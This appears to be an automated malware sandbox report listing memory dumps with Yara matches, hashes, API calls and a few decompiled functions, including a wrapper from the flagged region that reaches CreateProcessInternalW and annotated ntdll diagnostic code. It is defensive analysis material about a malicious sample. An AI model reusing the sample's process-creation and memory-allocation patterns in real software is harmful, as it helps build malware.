                                                  • Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 0406f766fc4d4c5098ed796d8da25b7152bea9ce20bf0a3ffdfb0ae6d6a2ed2e
                                                  • Instruction ID: 353db2684c5f20af564f5aec65a6ab38479d96a5e9e524f5d5cd4c149451af3b
                                                  • Opcode Fuzzy Hash: 0406f766fc4d4c5098ed796d8da25b7152bea9ce20bf0a3ffdfb0ae6d6a2ed2e
                                                  • Instruction Fuzzy Hash: 2F9002A123180142D70065696C14B07010597D0343F61D125A0154554CC9558871A561
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: d6363e76ca408630fcb76138f9ac141f1f6d65bbf8df22108fc1deddab768825
                                                  • Instruction ID: 1fe9aad4998b0cdf3efb747b868e61de304b009c8d2e6f97425621f0c72b9746
                                                  • Opcode Fuzzy Hash: d6363e76ca408630fcb76138f9ac141f1f6d65bbf8df22108fc1deddab768825
                                                  • Instruction Fuzzy Hash: 9F9002B122100902D6807159640464A010597D1342FA1D025A0025654DCA558A69B7E1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: a6e9c134469b95ffd6d142d733e5d62a83223da1514dd945f9349d30654b2e9a
                                                  • Instruction ID: 9114985aa24bc681b554867fad4534ad4cf40590a2d8a7cadb36ab33af524329
                                                  • Opcode Fuzzy Hash: a6e9c134469b95ffd6d142d733e5d62a83223da1514dd945f9349d30654b2e9a
                                                  • Instruction Fuzzy Hash: 6D9002B122140502D6006159681470B010597D0343F61D021A1164555D86658861B5B1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 9b350cd5f63288e978b8cb1ac245a28b68941da542df55121c20eff327c7b361
                                                  • Instruction ID: 37d6741e778b67e525e258f509735cd24962c2f38a4d19d9cb5e1351e800ad28
                                                  • Opcode Fuzzy Hash: 9b350cd5f63288e978b8cb1ac245a28b68941da542df55121c20eff327c7b361
                                                  • Instruction Fuzzy Hash: 219002A16210014246407169A8449064105BBE1352B61D131A0998550D85998875A6A5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 37%
                                                              void* E00418550(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, char _a48, intOrPtr _a52) {
                                                                  intOrPtr _t16;
                                                                  intOrPtr* _t2;
                                                                  intOrPtr* _t3;
                                                                  char* _t5;
                                                                  void* _t22;
                                                                  void* _t33;
                                                                  intOrPtr* _t34;

                                                                  _t16 = _a4; // _a4: base of the caller's context structure
                                                                  _t2 = _t16 + 0xa14; // 0x58de852
                                                                  _t3 = _t16 + 0xc80; // 0x408909
                                                                  _t34 = _t3; // slot at +0xc80 that is called through below
                                                                  E00418DD0(_t33, _a4, _t34,  *_t2, 0, 0x37); // helper invoked before the indirect call (its body is not in this dump)
                                                                  _t5 =  &_a48; // 0x407c45
                                                                  _t22 =  *((intOrPtr*)( *_t34))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44,  *_t5, _a52); // executed: indirect call that reaches CreateProcessInternalW, ref 004185A4 (see APIs below)
                                                                  return _t22;
                                                              }

                                                  APIs
                                                  • CreateProcessInternalW.KERNELBASE(00407C1D,00407C45,004079DD,00000010,?,00000044,?,?,?,00000044,E|@D,00000010,004079DD,00407C45,00407C1D,00407C89), ref: 004185A4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateInternalProcess
                                                  • String ID: E|@D
                                                  • API String ID: 2186235152-1370303659
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                              void* E004184A0(intOrPtr _a4, char _a8, long _a12, long _a16) {
                                                                  char* _t6;
                                                                  void* _t10;
                                                                  void* _t15;

                                                                  E00418DD0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34); // helper invoked before the heap call, with the slot at +0xc70 (its body is not in this dump)
                                                                  _t6 =  &_a8; // 0x413526
                                                                  _t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed: heap handle, flags, size; ref 004184CD (see APIs below)
                                                                  return _t10;
                                                              }

                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004184CD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID: &5A
                                                  • API String ID: 1279760036-1617645808
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072CA
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MessagePostThread
                                                  • String ID:
                                                  • API String ID: 1836367815-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041850D
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418670
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LookupPrivilegeValue
                                                  • String ID:
                                                  • API String ID: 3899507212-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041850D
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418670
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LookupPrivilegeValue
                                                  • String ID:
                                                  • API String ID: 3899507212-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418548
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExitProcess
                                                  • String ID:
                                                  • API String ID: 621844428-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Load
                                                  • String ID:
                                                  • API String ID: 2234796835-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4b09a1bc9bc9afbefa2c62d72025f6b89f24a50f1ac9473446c7d076f30b4a35
                                                  • Instruction ID: cfa079f52e590e074eeb73f9c0d0da38ed7fafa9f9a3c8cd6feb04f65b1fe7b5
                                                  • Opcode Fuzzy Hash: 4b09a1bc9bc9afbefa2c62d72025f6b89f24a50f1ac9473446c7d076f30b4a35
                                                  • Instruction Fuzzy Hash: 469002E123100142D60461596404706014597E1342F61D022A2154554CC5698C71A165
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8cfe28906cf7e24234d511a4fcfe8718cff6ebe27d0e4528779c4232cf8da96b
                                                  • Instruction ID: 54eb6a571303f7ec75e834ed2f8fce56d9f6c7585ce7ef319ddbd3fa214998ef
                                                  • Opcode Fuzzy Hash: 8cfe28906cf7e24234d511a4fcfe8718cff6ebe27d0e4528779c4232cf8da96b
                                                  • Instruction Fuzzy Hash: E69002B122100902D60461596804686010597D0342F61D021A6024655E96A588A1B171
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f5327e0f319e37b00d3350855d3bd838e13548840f1ee85600155f8a68142153
                                                  • Instruction ID: 7b91c55868fa640606e59dc87692d65b3ff529ec2775453b952c0b0115785fe7
                                                  • Opcode Fuzzy Hash: f5327e0f319e37b00d3350855d3bd838e13548840f1ee85600155f8a68142153
                                                  • Instruction Fuzzy Hash: 799002E122140503D64065596804607010597D0343F61D021A2064555E8A698C61B175
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 45ffac80c19a3823ac29fcc775182d394e37f804151545346b28870b944376d3
                                                  • Instruction ID: 271796278df357bad4deee0f44f57b5d62b325f31649b537bbdd0fe254fb7402
                                                  • Opcode Fuzzy Hash: 45ffac80c19a3823ac29fcc775182d394e37f804151545346b28870b944376d3
                                                  • Instruction Fuzzy Hash: 839002A5231001020645A559260450B0545A7D63927A1D025F1416590CC6618875A361
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bdb7b3cabd52c45682ee4392ea3d21eb6b01a351849d85c8985a8755fe2dc4d8
                                                  • Instruction ID: 6d7175d7d06c8abfe1a73a583d056b4c91b9c75b689d5d9a12acabf8f4cd7a76
                                                  • Opcode Fuzzy Hash: bdb7b3cabd52c45682ee4392ea3d21eb6b01a351849d85c8985a8755fe2dc4d8
                                                  • Instruction Fuzzy Hash: 5C9002E1221141924A00A259A404B0A460597E0342F61D026E1054560CC5658861E175
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b2138992b6e03d961fa44686bccb088f41a7606a67b5c28e1ca79badcbc7c6f5
                                                  • Instruction ID: 0b430aebfffe0432406c51ab3f199284030409a4b6bcaa9b60dd7d6c477c70d4
                                                  • Opcode Fuzzy Hash: b2138992b6e03d961fa44686bccb088f41a7606a67b5c28e1ca79badcbc7c6f5
                                                  • Instruction Fuzzy Hash: 659002B1A25001129640715968146464106A7E0782F65D021A0514554C89948A65A3E1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e3be5647845172618b703cfd46649c49792ee9bef01aa1672d47ea5fc4830e58
                                                  • Instruction ID: 4780682ef170f8e50222bb57ffbcd7ba3295b6edb2a1d11f098e642bfa54ac91
                                                  • Opcode Fuzzy Hash: e3be5647845172618b703cfd46649c49792ee9bef01aa1672d47ea5fc4830e58
                                                  • Instruction Fuzzy Hash: 3A9002B122100942D60061596404B46010597E0342F61D026A0124654D8655C861B561
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 79002f1f531d14d66b462adae09082d65743d01bd4c80ce0519f17acb45a8409
                                                  • Instruction ID: d5111bf74708527f96c8bb9d880ac6c82cc55e15d306af0c124a47428d77ea86
                                                  • Opcode Fuzzy Hash: 79002f1f531d14d66b462adae09082d65743d01bd4c80ce0519f17acb45a8409
                                                  • Instruction Fuzzy Hash: A89002A122144542D64062596804B0F420597E1343FA1D029A4156554CC9558865A761
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2a72f4911982a8b8cc8c309c093c97eeec9ff14d70e18d075106292b9eb6be98
                                                  • Instruction ID: 71284ed602a2edef9f49db8baf1698544ba0fd4276d5f70d4f221c3e09681487
                                                  • Opcode Fuzzy Hash: 2a72f4911982a8b8cc8c309c093c97eeec9ff14d70e18d075106292b9eb6be98
                                                  • Instruction Fuzzy Hash: B79002B122140502D60061596808747010597D0343F61D021A5164555E86A5C8A1B571
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5669371b70a2988daf4c38c6ed0001bd5bc78228dd0e99bab7e628e28e3d7741
                                                  • Instruction ID: e8cbca7b528ea50e655b2babefae2aee02ef4ab253abfed8a92ba48c02d29ee3
                                                  • Opcode Fuzzy Hash: 5669371b70a2988daf4c38c6ed0001bd5bc78228dd0e99bab7e628e28e3d7741
                                                  • Instruction Fuzzy Hash: 309002B122144102D6407159A44460B5105A7E0342F61D421E0425554C86558866E261
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: daebe8896aa3fea9a2fdd5fa99a33d7ceb0c2bcf80a9c636399730aee2757439
                                                  • Instruction ID: 19fadd2a364cb43abe6d61388c442b021dbdb70f1fce0c8eb1eea64c029f90d0
                                                  • Opcode Fuzzy Hash: daebe8896aa3fea9a2fdd5fa99a33d7ceb0c2bcf80a9c636399730aee2757439
                                                  • Instruction Fuzzy Hash: 819002A126100902D6407159A4147070106D7D0742F61D021A0024554D86568975B6F1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 53%
                                                  			/* Decompiled by the sandbox from the unpacked region at 00BC0000. The format strings and
                                                  			   the structure offsets used below match ntdll's critical-section timeout diagnostics on
                                                  			   x86 (TEB.ClientId.UniqueProcess/UniqueThread at 0x20/0x24, RTL_CRITICAL_SECTION.OwningThread
                                                  			   at 0xC, RTL_CRITICAL_SECTION_DEBUG.ContentionCount at 0x14); L00C75720(component, level, format, ...)
                                                  			   has the shape of DbgPrintEx. The comments are the editor's reading of the code, not sandbox output. */
                                                  			E00C7FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                  				void* _t7;
                                                  				intOrPtr _t9;
                                                  				intOrPtr _t10;
                                                  				intOrPtr* _t12;
                                                  				intOrPtr* _t13;
                                                  				intOrPtr _t14;
                                                  				intOrPtr* _t15;
                                                  
                                                  				_t13 = __edx;                                   /* pointer to the 64-bit timeout (two dwords) */
                                                  				_push(_a4);
                                                  				_t14 =  *[fs:0x18];                             /* TEB (fs:[0x18] is NtTib.Self) */
                                                  				_t15 = _t12;                                    /* critical section, passed in a register the decompiler did not name */
                                                  				/* 64-bit signed division: relative timeout (negative, 100 ns units) / -10,000,000 (0xFFFFFFFFFF676980) -> seconds */
                                                  				_t7 = L00C2CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                  				_push(_t13);
                                                  				L00C75720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                  				_t9 =  *_t15;                                   /* RTL_CRITICAL_SECTION.DebugInfo */
                                                  				if(_t9 == 0xffffffff) {                         /* no debug record attached */
                                                  					_t10 = 0;
                                                  				} else {
                                                  					_t10 =  *((intOrPtr*)(_t9 + 0x14));         /* DebugInfo->ContentionCount */
                                                  				}
                                                  				_push(_t10);
                                                  				_push(_t15);                                    /* Critical Section %p */
                                                  				_push( *((intOrPtr*)(_t15 + 0xc)));             /* OwningThread ("owner tid") */
                                                  				_push( *((intOrPtr*)(_t14 + 0x24)));            /* TEB.ClientId.UniqueThread */
                                                  				return L00C75720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));   /* TEB.ClientId.UniqueProcess */
                                                  			}
                                                  
                                                  			Instruction addresses (disassembly view): 0x00c7fdda, 0x00c7fde2, 0x00c7fde5, 0x00c7fdec, 0x00c7fdfa, 0x00c7fdff, 0x00c7fe0a, 0x00c7fe0f, 0x00c7fe17, 0x00c7fe1e, 0x00c7fe19, 0x00c7fe20, 0x00c7fe21, 0x00c7fe22, 0x00c7fe25, 0x00c7fe40

                                                  APIs
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C7FDFA
                                                  Strings
                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00C7FE2B
                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00C7FE01
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                  • API String ID: 885266447-3903918235
                                                  • Opcode ID: 42a327e9f9fe8c56628eb3170436e88d3c58b58dc64c97a3bd8c8ce164a9fc80
                                                  • Instruction ID: 88a5d5a3d55efaae925151bd760e0725c00de396db6a47c6af9fc178524108ac
                                                  • Opcode Fuzzy Hash: 42a327e9f9fe8c56628eb3170436e88d3c58b58dc64c97a3bd8c8ce164a9fc80
                                                  • Instruction Fuzzy Hash: FCF0F632200641BFD6241A55DC42F23BB6AEB44730F248315F628566E1EAA2FC20A6F0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Executed Functions

                                                  APIs
                                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,04CD3BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,04CD3BA7,007A002E,00000000,00000060,00000000,00000000), ref: 04CD821D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID: .z`
                                                  • API String ID: 823142352-1441809116
                                                  • Opcode ID: b87aeccf9c780add8254e184b1f90f1a4465a1834338ca1cd772a9b941d60a71
                                                  • Instruction ID: 875cb495eea85f8de9e54930baaac3a6cd60d1afb3731408f0febafc2dcc06c1
                                                  • Opcode Fuzzy Hash: b87aeccf9c780add8254e184b1f90f1a4465a1834338ca1cd772a9b941d60a71
                                                  • Instruction Fuzzy Hash: 761190B2614209ABDB08DF98DC85DEB73AEAF8C754F158648BA1997241D630EC11CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,04CD3BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,04CD3BA7,007A002E,00000000,00000060,00000000,00000000), ref: 04CD821D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID: .z`
                                                  • API String ID: 823142352-1441809116
                                                  • Opcode ID: b7233180f1a2a08244d762850083161ecf4ddca1709c7ff8d811d5d98f439070
                                                  • Instruction ID: 07aeb0ad2b5c95e58e5568625ba4e631625fa156aaece81dc598e923a22173a5
                                                  • Opcode Fuzzy Hash: b7233180f1a2a08244d762850083161ecf4ddca1709c7ff8d811d5d98f439070
                                                  • Instruction Fuzzy Hash: 3901AFB2204108AFCB58CF98DC85EEB77A9AF9C354F158248FE1D97241D630EC11CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,04CD3BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,04CD3BA7,007A002E,00000000,00000060,00000000,00000000), ref: 04CD821D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID: .z`
                                                  • API String ID: 823142352-1441809116
                                                  • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                  • Instruction ID: d3d6fa73f07b17fcc427760c0f8c9c569c5b51007010452fc3ee2ecee3517f2d
                                                  • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                  • Instruction Fuzzy Hash: 9FF0BDB2200208ABCB08DF88DC84EEB77ADAF8C754F158248BA1D97240C630F8118BA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,04CC2D11,00002000,00003000,00000004), ref: 04CD83E9
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateMemoryVirtual
                                                  • String ID:
                                                  • API String ID: 2167126740-0
                                                  • Opcode ID: a250176d316e2fb3a194b34481d49198d296d124c15f5b1cc196cea366f46a87
                                                  • Instruction ID: e117879fe63b1b1b9ac68698fdabd409a04f09b4d721fc0d0c6136a4f82e73fa
                                                  • Opcode Fuzzy Hash: a250176d316e2fb3a194b34481d49198d296d124c15f5b1cc196cea366f46a87
                                                  • Instruction Fuzzy Hash: 8F0116B6200209ABDB14EF98DC85DEB77AEEF88654F118509FE1997341D630E921CBF0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
